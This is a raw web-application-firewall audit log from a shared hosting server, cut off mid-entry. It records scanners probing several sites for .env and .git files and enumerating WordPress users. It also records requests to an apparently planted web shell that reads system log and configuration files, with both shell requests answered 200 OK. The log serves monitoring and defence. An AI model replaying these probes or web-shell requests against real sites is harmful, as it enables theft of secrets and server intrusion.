/internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --df85b521-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=b3b941308bb71a750ba2c3607f626ad51749952107; expires=Sun, 15 Jun 2025 02:48:27 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13614 Connection: close Content-Type: text/html; charset=UTF-8 --df85b521-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.retaxis.com"] [uri "/.env.local"] [unique_id "aE4masH4SeX80EzN5eWZhQAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952106471742 1137681 (- - -) Stopwatch2: 1749952106471742 1137681; combined=1954, p1=396, p2=1472, p3=0, p4=0, p5=86, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --df85b521-Z-- --3be1634c-A-- [15/Jun/2025:07:18:28.928811 +0530] aE4maxkoa9Lad8nP7KOINgAAABA 185.177.72.144 39762 127.0.0.1 7081 --3be1634c-B-- GET /.env.old HTTP/1.0 Host: www.retaxis.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3be1634c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=a42612bc7192b71e5cd0468003262b831749952108; expires=Sun, 15 Jun 2025 02:48:28 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13614 Connection: close Content-Type: text/html; charset=UTF-8 --3be1634c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.retaxis.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.retaxis.com"] [uri "/.env.old"] [unique_id "aE4maxkoa9Lad8nP7KOINgAAABA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.retaxis.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/.env.old"] [unique_id "aE4maxkoa9Lad8nP7KOINgAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952107740595 1188283 (- - -) Stopwatch2: 1749952107740595 1188283; combined=1866, p1=317, p2=1439, p3=0, p4=0, p5=109, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3be1634c-Z-- --b2ac6475-A-- [15/Jun/2025:07:18:30.140198 +0530] aE4mbfxUdei9jPXW8Ps7XwAAAAU 185.177.72.144 39806 127.0.0.1 7081 --b2ac6475-B-- GET /.env.production HTTP/1.0 Host: www.retaxis.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b2ac6475-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=21f210ca5664eadc8911544096e5b6521749952109; expires=Sun, 15 Jun 2025 02:48:29 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13614 Connection: close Content-Type: text/html; charset=UTF-8 --b2ac6475-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.retaxis.com"] [uri "/.env.production"] [unique_id "aE4mbfxUdei9jPXW8Ps7XwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952109053811 1086453 (- - -) Stopwatch2: 1749952109053811 1086453; combined=1753, p1=378, p2=1288, p3=0, p4=0, p5=86, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b2ac6475-Z-- --c20cec18-A-- [15/Jun/2025:07:18:35.253699 +0530] aE4mcj9o8tFLnaQ0S_42WQAAAAQ 185.177.72.144 41886 127.0.0.1 7081 --c20cec18-B-- GET /app/.env HTTP/1.0 Host: www.retaxis.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c20cec18-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=39745962662eb4f3601a50389f55918c1749952114; expires=Sun, 15 Jun 2025 02:48:34 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13614 Connection: close Content-Type: text/html; charset=UTF-8 --c20cec18-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.retaxis.com"] [uri "/app/.env"] [unique_id "aE4mcj9o8tFLnaQ0S_42WQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952114098838 1154928 (- - -) Stopwatch2: 1749952114098838 1154928; combined=1689, p1=384, p2=1212, p3=0, p4=0, p5=93, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c20cec18-Z-- --6f198d1c-A-- [15/Jun/2025:07:18:47.487385 +0530] aE4mfodVJK-eDwr5Vlo6EgAAAAc 185.177.72.144 37386 127.0.0.1 7081 --6f198d1c-B-- GET /laravel/.env HTTP/1.0 Host: www.retaxis.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6f198d1c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=12a102db776e26351debbe0b5f2c0ddd1749952127; expires=Sun, 15 Jun 2025 02:48:47 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13614 Connection: close Content-Type: text/html; charset=UTF-8 --6f198d1c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.retaxis.com"] [uri "/laravel/.env"] [unique_id "aE4mfodVJK-eDwr5Vlo6EgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952126386784 1100668 (- - -) Stopwatch2: 1749952126386784 1100668; combined=1824, p1=365, p2=1375, p3=0, p4=0, p5=83, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f198d1c-Z-- --25eb9a38-A-- [15/Jun/2025:07:25:54.734854 +0530] aE4oKLdgU2RqPO-R9-XYzgAAAA0 104.164.104.2 44748 127.0.0.1 7081 --25eb9a38-B-- GET /.git/config HTTP/1.0 Host: www.gulachi.com X-Real-IP: 104.164.104.2 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/604.1 Accept-Charset: utf-8 Accept-Encoding: gzip --25eb9a38-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=jejhk3a4id0ssjfhjbj7fbu0e0; path=/ Set-Cookie: _sfs_id=bb7f4e3f7d9a818b97ee787247ad0cb01749952553; expires=Sun, 15 Jun 2025 02:55:53 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --25eb9a38-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.git/config"] [unique_id "aE4oKLdgU2RqPO-R9-XYzgAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952552879063 1855869 (- - -) Stopwatch2: 1749952552879063 1855869; combined=1898, p1=391, p2=1401, p3=0, p4=0, p5=105, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --25eb9a38-Z-- --58415a62-A-- [15/Jun/2025:07:27:16.319534 +0530] aE4oeh6N9C2vdY7GQBU1IQAAAAY 104.164.104.2 55658 127.0.0.1 7081 --58415a62-B-- GET /.git/config HTTP/1.0 Host: www.gulachi.com X-Real-IP: 104.164.104.2 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --58415a62-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=uit7a7eilh50httc2huiv75n19; path=/ Set-Cookie: _sfs_id=efa56b1ef81e49ac4859ec6fd8259c151749952635; expires=Sun, 15 Jun 2025 02:57:15 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --58415a62-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.git/config"] [unique_id "aE4oeh6N9C2vdY7GQBU1IQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952634359576 1960052 (- - -) Stopwatch2: 1749952634359576 1960052; combined=160295, p1=393, p2=1249, p3=0, p4=0, p5=79379, sr=99, sw=1, l=0, gc=79273 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --58415a62-Z-- --422a5420-A-- [15/Jun/2025:07:27:58.571030 +0530] aE4opT9o8tFLnaQ0S_43KQAAAAQ 91.122.53.173 44342 127.0.0.1 7081 --422a5420-B-- GET /.git/HEAD HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 91.122.53.173 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: identity User-Agent: Python-urllib/3.13 --422a5420-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --422a5420-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/.git/HEAD"] [unique_id "aE4opT9o8tFLnaQ0S_43KQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952677557973 1013131 (- - -) Stopwatch2: 1749952677557973 1013131; combined=1929, p1=407, p2=1421, p3=0, p4=0, p5=100, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --422a5420-Z-- --7929282f-A-- [15/Jun/2025:07:28:19.794126 +0530] aE4ou7dgU2RqPO-R9-XY_QAAAA0 38.211.246.81 52210 127.0.0.1 7081 --7929282f-B-- GET /.env HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 38.211.246.81 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --7929282f-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.3.22 Pragma: no-cache Cache-Control: no-cache, must-revalidate, private, max-age=0 Expires: Sat, 26 Jul 1997 05:00:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 --7929282f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.3econcepts.com"] [uri "/.env"] [unique_id "aE4ou7dgU2RqPO-R9-XY_QAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952699446013 348183 (- - -) Stopwatch2: 1749952699446013 348183; combined=2281, p1=463, p2=1723, p3=0, p4=0, p5=95, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7929282f-Z-- --4556c23f-A-- [15/Jun/2025:08:04:11.761063 +0530] aE4xIx6N9C2vdY7GQBU39gAAAAY 98.83.177.42 34788 127.0.0.1 7081 --4556c23f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/mail.err.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 98.83.177.42 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --4556c23f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2946 Connection: close Content-Type: text/html; charset=UTF-8 --4556c23f-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE4xIx6N9C2vdY7GQBU39gAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749954851755933 5198 (- - -) Stopwatch2: 1749954851755933 5198; combined=2944, p1=484, p2=2291, p3=49, p4=44, p5=76, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4556c23f-Z-- --ef45e015-A-- [15/Jun/2025:08:06:49.358759 +0530] aE4xv32MSXWlBRpdvOiKiAAAAAk 85.204.70.92 45946 127.0.0.1 7081 --ef45e015-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.gulachi.com X-Real-IP: 85.204.70.92 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: PHPSESSID=ca0i7r9552fidqt6gk5v9jak04; _sfs_id=562ac99ea9c352948ef7e0d91bfdf7391749955006 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --ef45e015-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Robots-Tag: noindex Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type, X-OptinMonster-ApiKey X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin WPO-Cache-Status: not cached WPO-Cache-Message: This is a REST API request (identified by REST_REQUEST constant) Connection: close Content-Type: application/json; charset=UTF-8 --ef45e015-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.gulachi.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.gulachi.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.gulachi.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE4xv32MSXWlBRpdvOiKiAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749955007667670 1691180 (- - -) Stopwatch2: 1749955007667670 1691180; combined=2154, p1=348, p2=1728, p3=0, p4=0, p5=77, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ef45e015-Z-- --e1f1e92d-A-- [15/Jun/2025:08:10:55.241551 +0530] aE4yt32MSXWlBRpdvOiK0QAAAAk 52.169.12.179 40794 127.0.0.1 7080 --e1f1e92d-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: decklancer.com X-Real-IP: 52.169.12.179 Connection: close --e1f1e92d-F-- HTTP/1.1 404 Not Found Content-Length: 260 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1f1e92d-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||decklancer.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||decklancer.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "decklancer.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE4yt32MSXWlBRpdvOiK0QAAAAk"] Stopwatch: 1749955255238757 2831 (- - -) Stopwatch2: 1749955255238757 2831; combined=1675, p1=354, p2=1228, p3=23, p4=21, p5=49, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1f1e92d-Z-- --60086f7e-A-- [15/Jun/2025:08:18:08.516738 +0530] aE40Z32MSXWlBRpdvOiLewAAAAk 173.239.224.34 46342 127.0.0.1 7081 --60086f7e-B-- GET /.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 173.239.224.34 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --60086f7e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --60086f7e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env"] [unique_id "aE40Z32MSXWlBRpdvOiLewAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749955687398001 1118796 (- - -) Stopwatch2: 1749955687398001 1118796; combined=2559, p1=622, p2=1849, p3=0, p4=0, p5=87, sr=152, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --60086f7e-Z-- --4b8f1203-A-- [15/Jun/2025:08:24:47.599363 +0530] aE419x6N9C2vdY7GQBU5wAAAAAY 3.223.181.32 54472 127.0.0.1 7081 --4b8f1203-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/sysctl.d&viewfile=//etc/sysctl.d/10-network-security.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.223.181.32 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --4b8f1203-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3058 Connection: close Content-Type: text/html; charset=UTF-8 --4b8f1203-H-- Message: Warning. Matched phrase "etc/sysctl.d/10-network-security.conf" at ARGS:viewfile. [file 